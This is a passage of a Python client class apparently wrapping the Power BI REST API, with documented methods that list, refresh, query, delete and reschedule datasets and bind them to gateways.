res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_datasources(self, dataset_id):
"""Returns a list of data sources for the specified dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all the datasources in the dataset from My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}/datasources".format(dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_datasources_in_group(self, workspace_id, dataset_id):
"""Returns a list of data sources for the specified dataset from the specified workspace
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all the datasources in the dataset from the workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/datasources".format(workspace_id, dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_dataset_to_dataflows_links_in_group(self, workspace_id):
"""Returns a list of upstream dataflows for datasets from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all upstream dataflows in the dataset from a workspace
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/upstreamDataflows".format(workspace_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
if res.text == '':
res.raise_for_status()
return res
else:
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_direct_query_refresh_schedule(self, dataset_id):
"""Returns the refresh schedule for a specified DirectQuery or LiveConnection dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing the direct query refresh schedule in a dataset from My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}/directQueryRefreshSchedule".format(dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_direct_query_refresh_schedule_in_group(self, workspace_id, dataset_id):
"""Returns the refresh schedule for a specified DirectQuery or LiveConnection dataset from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing the direct query refresh schedule in a dataset from a workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/directQueryRefreshSchedule".format(workspace_id, dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_gateway_datasources(self, dataset_id):
"""This API is deprecated, use Get Datasources instead.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
"""
print("This API is deprecated, use Get Datasources instead.")
def get_gateway_datasources_in_group(self, dataset_id):
"""This API is deprecated, use Get Datasources In Group instead.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
"""
print("This API is deprecated, use Get Datasources In Group instead.")
def get_parameters(self, dataset_id):
"""Returns a list of parameters for the specified dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all the parameters in the dataset from My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}/parameters".format(dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_parameters_in_group(self, workspace_id, dataset_id):
"""Returns a list of parameters for the specified dataset from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all the parameters in the dataset from workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/parameters".format(workspace_id, dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_refresh_history(self, dataset_id, top=None):
"""Returns the refresh history for the specified dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
top: int
The requested number of entries in the refresh history. If not provided, the default is all available entries.
### Returns
----
Dict:
A dictionary containing a refresh history in a dataset in My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}/refreshes".format(dataset_id)
if top != None:
url = url + "?$top={}".format(str(top))
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_refresh_history_in_group(self, workspace_id, dataset_id, top=None):
"""Returns the refresh history for the specified dataset from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
top: int
The requested number of entries in the refresh history. If not provided, the default is all available entries.
### Returns
----
Dict:
A dictionary containing a refresh history in a dataset from workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/refreshes".format(workspace_id, dataset_id)
if top != None:
url = url + "?$top={}".format(str(top))
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_refresh_schedule(self, dataset_id):
"""Returns the refresh schedule for the specified dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing a refresh schedule in a dataset from My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}/refreshSchedule".format(dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_refresh_schedule_in_group(self, workspace_id, dataset_id):
"""Returns the refresh schedule for the specified dataset from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing a refresh schedule in a dataset from workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/refreshSchedule".format(workspace_id, dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def refresh_dataset(self, dataset_id, notifyOption):
"""Triggers a refresh for the specified dataset from My workspace.
For Shared capacities, a maximum of eight requests per day, which includes refreshes executed using a scheduled refresh.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
notifyOption: NotifyOption str
Mail notification options (success and/or failure, or none). Options: { MailOnCompletion, MailOnFailure, NoNotification }
### Returns
----
Response object from requests library. 202 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/datasets/{}/refreshes".format(dataset_id)
body = {
"notifyOption": notifyOption
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def refresh_dataset_in_group(self, workspace_id, dataset_id, notifyOption):
"""Triggers a refresh for the specified dataset from the specified workspace.
For Shared capacities, a maximum of eight requests per day, which includes refreshes executed using a scheduled refresh.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
notifyOption: NotifyOption str
Mail notification options (success and/or failure, or none). Options: { MailOnCompletion, MailOnFailure, NoNotification }
### Returns
----
Response object from requests library. 202 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/refreshes".format(workspace_id, dataset_id)
body = {
"notifyOption": notifyOption
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def take_over_dataset_in_group(self, workspace_id, dataset_id):
"""Transfers ownership over the specified dataset to the current authorized user.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
None
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/Default.TakeOver".format(workspace_id, dataset_id)
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def discover_gateways(self, dataset_id):
"""Returns a list of gateways that the specified dataset from My workspace can be bound to.
This API call is only relevant to datasets that have at least one on-premises connection. For datasets with cloud-only connections, this API call returns an empty list.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing a list of gateways from My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}/Default.DiscoverGateways".format(dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def discover_gateways_in_group(self, workspace_id, dataset_id):
"""Returns a list of gateways that the specified dataset from the specified workspace can be bound to.
This API call is only relevant to datasets that have at least one on-premises connection. For datasets with cloud-only connections, this API call returns an empty list.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id:
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing a list of gateways from the workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/Default.DiscoverGateways".format(workspace_id, dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def delete_dataset(self, dataset_id):
"""Deletes the specified dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/datasets/{}".format(dataset_id)
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.delete(url, headers=headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def delete_dataset_in_group(self, workspace_id, dataset_id):
"""Deletes the specified dataset from the specified workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}".format(workspace_id, dataset_id)
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.delete(url, headers=headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def execute_queries(self, dataset_id, query, return_pandas=False):
"""Executes Data Analysis Expressions (DAX) queries against the provided dataset. The dataset must reside in My workspace or another new workspace experience workspace.
DAX query errors will result in: A response error, such as DAX query failure. A failure HTTP status code (400).
Limitation: A query that requests more than one table, or more than 100,000 table rows, will result in Error.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
query: str
DAX query returning a Table. Starts with EVALUATE
return_pandas: bool
Flag to specify if you want to return a dict response or a pandas dataframe of events.
### Returns
----
If return_pandas = True returns a Pandas dataframe concatenating iterations otherwise it returns a dict of the response
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/datasets/{}/executeQueries".format(dataset_id)
body = {"queries": [{"query": query}], "serializerSettings": {"includeNulls": "true"}}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
#Encode text in json to avoid Unexpected UTF-8 BOM (decode using utf-8-sig)
encoded_data = json.loads(res.text.encode().decode('utf-8-sig'))
if return_pandas:
#get columns from json response - keys from dict
tabla_columnas = list(encoded_data['results'][0]['tables'][0]['rows'][0].keys())
columnas = [columnita.split("[")[1].split("]")[0] for columnita in tabla_columnas]
print(columnas)
#get the number of rows to loop data
rows = len(encoded_data['results'][0]['tables'][0]['rows'])
print(rows)
#get data from json response - values from dict
datos = [list(encoded_data['results'][0]['tables'][0]['rows'][n].values()) for n in range(rows-1)]
print("datos")
#build a dataframe from the collected data
df = pd.DataFrame(data=datos, columns=columnas)
print(df.head())
return df
else:
return encoded_data
except requests.exceptions.HTTPError as ex:
print("ERROR ", ex)
except Exception as e:
print("ERROR ", e)
def execute_queries_in_group(self, workspace_id, dataset_id, query, return_pandas=False, impersonatedUserName=None):
"""Executes Data Analysis Expressions (DAX) queries against the provided dataset. The dataset must reside in My workspace or another new workspace experience workspace.
DAX query errors will result in: A response error, such as DAX query failure. A failure HTTP status code (400).
Limitation: A query that requests more than one table, or more than 100,000 table rows, will result in Error.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
return_pandas: bool
Flag to specify if you want to return a dict response or a pandas dataframe of events.
### Body
----
query: str
Requested. DAX query returning a Table. Starts with EVALUATE
impersonatedUserName: str
The UPN of a user to be impersonated. If the model is not RLS enabled, this will be ignored. E.g. "someuser@mycompany.com"
### Returns
----
If return_pandas = True returns a Pandas dataframe concatenating iterations otherwise it returns a dict of the response
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/executeQueries".format(workspace_id, dataset_id)
body = {"queries": [{"query": query}], "serializerSettings": {"includeNulls": "true"}}
if impersonatedUserName != None:
body["impersonatedUserName"]=impersonatedUserName
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
#Encode text in json to avoid Unexpected UTF-8 BOM (decode using utf-8-sig)
encoded_data = json.loads(res.text.encode().decode('utf-8-sig'))
if return_pandas:
#get columns from json response - keys from dict
tabla_columnas = list(encoded_data['results'][0]['tables'][0]['rows'][0].keys())
columnas = [columnita.split("[")[1].split("]")[0] for columnita in tabla_columnas]
print(columnas)
#get the number of rows to loop data
rows = len(encoded_data['results'][0]['tables'][0]['rows'])
print(rows)
#get data from json response - values from dict
datos = [list(encoded_data['results'][0]['tables'][0]['rows'][n].values()) for n in range(rows-1)]
print("datos")
#build a dataframe from the collected data
df = pd.DataFrame(data=datos, columns=columnas)
print(df.head())
return df
else:
return encoded_data
except requests.exceptions.HTTPError as ex:
print("ERROR ", ex)
except Exception as e:
print("ERROR ", e)
def update_parameters(self, dataset_id, updateDetails):
"""Updates the parameters values for the specified dataset from My workspace.
If you're using enhanced dataset metadata, refresh the dataset to apply the new parameter values.
If you're not using enhanced dataset metadata, wait 30 minutes for the update data sources operation to complete, and then refresh the dataset.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
updateDetails: UpdateMashupParameterDetails [] str
The dataset parameter list to update. Example:
[
{
"name": "ParameterName1",
"newValue": "NewDB"
},
{
"name": "ParameterName2",
"newValue": "5678"
}
]
### Returns
----
Response object from requests library. 200 OK
### Limitations
----
Datasets created using the public XMLA endpoint aren't supported. To make changes to those data sources, the admin must use the Azure Analysis Services client library for Tabular Object Model.
DirectQuery connections are only supported with enhanced dataset metadata.
Datasets with Azure Analysis Services live connections aren't supported.
Maximum of 100 parameters per request.
All specified parameters must exist in the dataset.
Parameters values should be of the expected type.
The parameter list cannot be empty or include duplicate parameters.
Parameters names are case-sensitive.
Parameter IsRequired must have a non-empty value.
The parameter types Any and Binary cannot be updated.
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/datasets/{}/Default.UpdateParameters".format(dataset_id)
body = {
"updateDetails": updateDetails
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def update_parameters_in_group(self, workspace_id, dataset_id, updateDetails):
"""Updates the parameters values for the specified dataset from the specified workspace.
If you're using enhanced dataset metadata, refresh the dataset to apply the new parameter values.
If you're not using enhanced dataset metadata, wait 30 minutes for the update data sources operation to complete, and then refresh the dataset.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
updateDetails: UpdateMashupParameterDetails [] str
The dataset parameter list to update. Example:
[
{
"name": "ParameterName1",
"newValue": "NewDB"
},
{
"name": "ParameterName2",
"newValue": "5678"
}
]
### Returns
----
Response object from requests library. 200 OK
### Limitations
----
Datasets created using the public XMLA endpoint aren't supported. To make changes to those data sources, the admin must use the Azure Analysis Services client library for Tabular Object Model.
DirectQuery connections are only supported with enhanced dataset metadata.
Datasets with Azure Analysis Services live connections aren't supported.
Maximum of 100 parameters per request.
All specified parameters must exist in the dataset.
Parameters values should be of the expected type.
The parameter list cannot be empty or include duplicate parameters.
Parameters names are case-sensitive.
Parameter IsRequired must have a non-empty value.
The parameter types Any and Binary cannot be updated.
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/Default.UpdateParameters".format(workspace_id, dataset_id)
body = {
"updateDetails": updateDetails
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, data = json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def update_refresh_schedule(self, dataset_id, NotifyOption=None, days=None, enabled=None, localTimeZoneId=None, times=None):
"""Updates the refresh schedule for the specified dataset from My workspace.
A request that disables the refresh schedule should contain no other changes.
At least one day must be specified. If no times are specified, then Power BI will use a default single time per day.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
NotifyOption: ScheduleNotifyOption str
Notification option at scheduled refresh termination. Example MailOnFailure or NoNotification.
days: str []
Days to execute the refresh. Example: ["Sunday", "Tuesday"]
enabled: bool
is the refresh enabled
localTimeZoneId: str
The ID of the timezone to use. See TimeZone Info. Example "UTC"
times: str []
Times to execute the refresh within each day. Example: ["07:00", "16:00"]
### Returns
----
Response object from requests library. 200 OK
### Limitations
----
The limit on the number of time slots per day depends on whether a Premium or Shared capacity is used.
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/datasets/{}/refreshSchedule".format(dataset_id)
body = {
"value": {}
}
if NotifyOption != None:
body["value"]["NotifyOption"]=NotifyOption
if days != None:
body["value"]["days"] = days
if enabled != None:
body["value"]["enabled"] = enabled
if localTimeZoneId != None:
body["value"]["localTimeZoneId"] = localTimeZoneId
if times != None:
body["value"]["times"]=times
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.patch(url, json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def update_refresh_schedule_in_group(self, workspace_id, dataset_id, NotifyOption=None, days=None, enabled=None, localTimeZoneId=None, times=None):
"""Updates the refresh schedule for the specified dataset from the specified workspace.
A request that disables the refresh schedule should contain no other changes.
At least one day must be specified. If no times are specified, then Power BI will use a default single time per day.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
NotifyOption: ScheduleNotifyOption str
Notification option at scheduled refresh termination. Example MailOnFailure or NoNotification.
days: str []
Days to execute the refresh. Example: ["Sunday", "Tuesday"]
enabled: bool
is the refresh enabled
localTimeZoneId: str
The ID of the timezone to use. See TimeZone Info. Example "UTC"
times: str []
Times to execute the refresh within each day. Example: ["07:00", "16:00"]
### Returns
----
Response object from requests library. 200 OK
### Limitations
----
The limit on the number of time slots per day depends on whether a Premium or Shared capacity is used.
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/refreshSchedule".format(workspace_id, dataset_id)
body = {
"value": {}
}
if NotifyOption != None:
body["value"]["NotifyOption"]=NotifyOption
if days != None:
body["value"]["days"] = days
if enabled != None:
body["value"]["enabled"] = enabled
if localTimeZoneId != None:
body["value"]["localTimeZoneId"] = localTimeZoneId
if times != None:
body["value"]["times"]=times
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.patch(url, json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def bind_to_gateway_preview(self, dataset_id, gatewayObjectId, datasourceObjectIds):
"""Binds the specified dataset from My workspace to the specified gateway, optionally with a given set of data source IDs. If you don’t supply a specific data source ID, the dataset will be bound to the first matching data source in the gateway. Only supports the on-premises data gateway
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
gatewayObjectId: str uuid
The gateway ID. When using a gateway cluster, the gateway ID refers to the primary (first) gateway in the cluster and is similar to the gateway cluster ID.
datasourceObjectIds: str []
The unique identifier for the datasource in the gateway
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/datasets/{}/Default.BindToGateway".format(dataset_id)
body = {
"gatewayObjectId": gatewayObjectId,
"datasourceObjectIds": datasourceObjectIds
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def bind_to_gateway_in_group_preview(self, workspace_id, dataset_id, gatewayObjectId, datasourceObjectIds):
"""Binds the specified dataset from the specified workspace to the specified gateway, optionally with a given set of data source IDs. If you don’t supply a specific data source ID, the dataset will be bound to the first matching data source in the gateway. Only supports the on-premises data gateway
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
gatewayObjectId: str uuid
The gateway ID. When using a gateway cluster, the gateway ID refers to the primary (first) gateway in the cluster and is similar to the gateway cluster ID.
datasourceObjectIds: str []
The unique identifier for the datasource in the gateway
### Returns
----
Response object from requests library. 200 OK
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/Default.BindToGateway".format(workspace_id, dataset_id)
body = {
"gatewayObjectId": gatewayObjectId,
"datasourceObjectIds": datasourceObjectIds
}
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.post(url, json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def update_direct_query_refresh_schedule_in_group_preview(self, dataset_id, frequency=None, days=None, enabled=None, localTimeZoneId=None, times=None):
"""Updates the refresh schedule for a specified DirectQuery or LiveConnection dataset from My workspace.
A request should contain either a set of days and times or a valid frequency, but not both. If you choose a set of days without specifying any times, then Power BI will use a default single time per day. Setting the frequency will automatically overwrite the days and times setting.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
frequency: int
The interval in minutes between successive refreshes. Supported values are 15, 30, 60, 120, and 180.
days: str []
Days to execute the refresh. Example: ["Sunday", "Tuesday"]
enabled: bool
is the refresh enabled
localTimeZoneId: str
The ID of the timezone to use. See TimeZone Info. Example "UTC"
times: str []
Times to execute the refresh within each day. Example: ["07:00", "16:00"]
### Returns
----
Response object from requests library. 200 OK
### Limitations
----
The limit on the number of time slots per day depends on whether a Premium or Shared capacity is used.
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/datasets/{}/directQueryRefreshSchedule".format(dataset_id)
body = {
"value": {}
}
if frequency != None:
body["value"]["frequency"]=frequency
if days != None:
body["value"]["days"] = days
if enabled != None:
body["value"]["enabled"] = enabled
if localTimeZoneId != None:
body["value"]["localTimeZoneId"] = localTimeZoneId
if times != None:
body["value"]["times"]=times
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.patch(url, json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def update_direct_query_refresh_schedule_in_group_preview(self, workspace_id, dataset_id, frequency=None, days=None, enabled=None, localTimeZoneId=None, times=None):
"""Updates the refresh schedule for a specified DirectQuery or LiveConnection dataset from the specified workspace.
A request should contain either a set of days and times or a valid frequency, but not both. If you choose a set of days without specifying any times, then Power BI will use a default single time per day. Setting the frequency will automatically overwrite the days and times setting.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Request Body
----
frequency: int
The interval in minutes between successive refreshes. Supported values are 15, 30, 60, 120, and 180.
days: str []
Days to execute the refresh. Example: ["Sunday", "Tuesday"]
enabled: bool
is the refresh enabled
localTimeZoneId: str
The ID of the timezone to use. See TimeZone Info. Example "UTC"
times: str []
Times to execute the refresh within each day. Example: ["07:00", "16:00"]
### Returns
----
Response object from requests library. 200 OK
### Limitations
----
The limit on the number of time slots per day depends on whether a Premium or Shared capacity is used.
"""
try:
url= "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/directQueryRefreshSchedule".format(workspace_id, dataset_id)
body = {
"value": {}
}
if frequency != None:
body["value"]["frequency"]=frequency
if days != None:
body["value"]["days"] = days
if enabled != None:
body["value"]["enabled"] = enabled
if localTimeZoneId != None:
body["value"]["localTimeZoneId"] = localTimeZoneId
if times != None:
body["value"]["times"]=times
headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)}
res = requests.patch(url, json.dumps(body), headers = headers)
res.raise_for_status()
return res
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
| 48.259887
| 307
